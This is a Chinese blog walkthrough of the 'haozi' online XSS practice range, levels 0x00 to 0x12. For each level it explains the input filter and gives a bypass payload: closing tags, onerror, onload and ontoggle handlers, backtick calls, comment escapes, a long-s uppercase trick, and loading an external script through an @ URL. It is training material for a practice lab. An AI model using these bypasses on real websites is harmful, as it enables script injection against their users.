当前位置:网站首页>XSS线上靶场---haozi
XSS线上靶场---haozi
2022-08-03 20:58:00 【抱小猫】
目录
线上靶场
https://xss.haozi.me/0x00
这一关没有什么限制,直接<script>alert(1)<script>就过去了
0x01
这一关是将我们输入的数据放入到<textarea>标签里面了,但是<textarea>标签里面无法执行JS代码,另外这关没有对符号等有其他限制,所以我们先闭合<textarea>标签,在写入JS代码
</textarea><script>alert(1)</script>
PS:HTML标签有自动纠错功能,所以无论后面加不加上<textarea>对后面的标签进行闭合都可以执行这个代码
0x02
这一关是将我们输入的数据传输到value中,所以我们需要先闭合双引号,再执行JS代码
aa" οnclick="alert(1)
0x03
这一关对(、)、[ 、] 进行了限制,这时我们就可以考虑使用反引号代替括号执行JS代码,在执行的JS代码前面需要对value进行双引号闭合
aa" <script>alert`1`</script>
0x04
这一关对(、)、[ 、] 、` 进行了限制,我们无法使用反引号后使用将括号进行编码尝试进行绕过
aa" <img src=1 οnerrοr=alert(1)
0x05
这一关会将输入的内容放入注释符中,且对输入的注释符有过滤,使用js中的第二种注释符:--!>
aa" --!> <img src=1 οnerrοr=alert(1) 不用编码也可以绕过
0x06
过滤了js中的点击事件,将函数换行后再执行
aa" type="image" src=1 onerror 需要换行
=alert(1)
0x07
过滤了JS中的script等标签,尖括号等特殊符号也过滤了,html语言比较松散-->会对不对的语法进行补全,不加结束标签试试,不行,不能一对尖括号,所以我们使用<img标签
<img src=1 οnerrοr=alert(1) 需要再结尾进行换行
0x08
输入的内容放入了<stype>标签中,<stype>标签中的内容不执行JS,利用换行实现闭合<stype>,换行也绕过了正则表达式
</style 一定要在标签没有闭合的状态下换行
><img src=1 οnerrοr=alert(1)
0x09
正则表达式限制了必须以http开头,可以闭合前面的标签,在中间实现绕过,并使用//注释后面的内容。
http://www.segmentfault.com"></script><script>alert(1)//
0x0A
URL格式:@可以将前面的网站重定向到后面的网站。所以我们可以先创建一个JS脚本,然后将网站重定向到我们自己写的JS脚本
http://[email protected]/test.js
0x0B
toUpperCase() 方法用于把字符串转换为大写。 此题将我们输入的内容转化成大写,
利用 <img src=1 οnerrοr=实体编码> 或 <svg/οnlοad=实体编码> 实现绕过
<img src=1 οnerrοr=alert(1)>
<svg/οnlοad=alert(1)>
0x0C
对输入的数据进行大小写,且过滤script,可以使用<svg/οnlοad=实体编码绕过> 或<details open οntοggle=实体编码>绕过
<svg/οnlοad=alert(1)>
<details open οntοggle=alert(1)>
0x0D
此关卡过滤了/[</"']符号,并且将输入的内容放入注释符内,我们需要先换行逃脱注释,写完弹窗函数后还需要换行将后面的符号注释掉。
#换了一行
alert(1)
--> #注释掉后面的单引号和括号
0x0E
此关卡对尖括号开头的字母进行了限制并且大写了字母,这时我们可以使用一个特殊符号 ſ --> 字符大写是会转成S,实现绕过
<ſvg/οnlοad=alert(1)>
<ſcript src="http://127.0.0.1/test.js"></ſcript> #我们通过引入自己的JS文件实现绕过
0x0F
这一关对很多符号进行了转义,但是可以直接识别,所以这样的编码限制没有太大作用,我们只需要将前面的闭合后弹窗将后面的字符注释掉就可以了。
bbb');alert(1)//
0x10
window.data就是一个全局变量,直接写alert相当于将alert传输到window.data
0x11
与F关 很类似,直接将前面的闭合,注释后面的就可以了
aa");alert(1)//
0x12
该关卡与11关相似,但是将双引号替换成了\\ ,我们需要加上\ 进行转义
aa\");alert(1)//
边栏推荐
猜你喜欢
[email protected] 594/
随机推荐
leetcode 448. Find All Numbers Disappeared in an Array 找到所有数组中消失的数字(简单)
图神经网络怎么入门?一文带你了解图神经网络入门路径-GNN入门
Kubernetes资源编排系列之三: Kustomize篇 作者 艄公(杨京华) 雪尧(郭耀星)
收藏-即时通讯(IM)开源项目OpenIM-功能手册
2022.8.2
NAACL 2022 | 具有元重加权的鲁棒自增强命名实体识别技术
在树莓派上搭建属于自己的网页(3)
Orcad Capture Cadence 新建原理图多部分smybol和Homogeneous、Heterogeneous类型介绍教程
YARN功能介绍、交互流程及调度策略
3种圆形按钮悬浮和点击事件
直播源码开发,各种常见的广告形式
Often forget HiFlow 】 【 check-in?Use tencent cloud scenario connector to remind you every day.
开源一夏 |如何优化线上服务器
leetcode 899. 有序队列
火了十几年的零信任,为啥还不能落地
Abs (), fabs () and LABS ()
小朋友学C语言(3):整数、浮点数、字符
2022年强网杯rcefile wp
简单又有效的基本折线图制作方法
化算力为战力:宁夏中卫的数字化转型启示录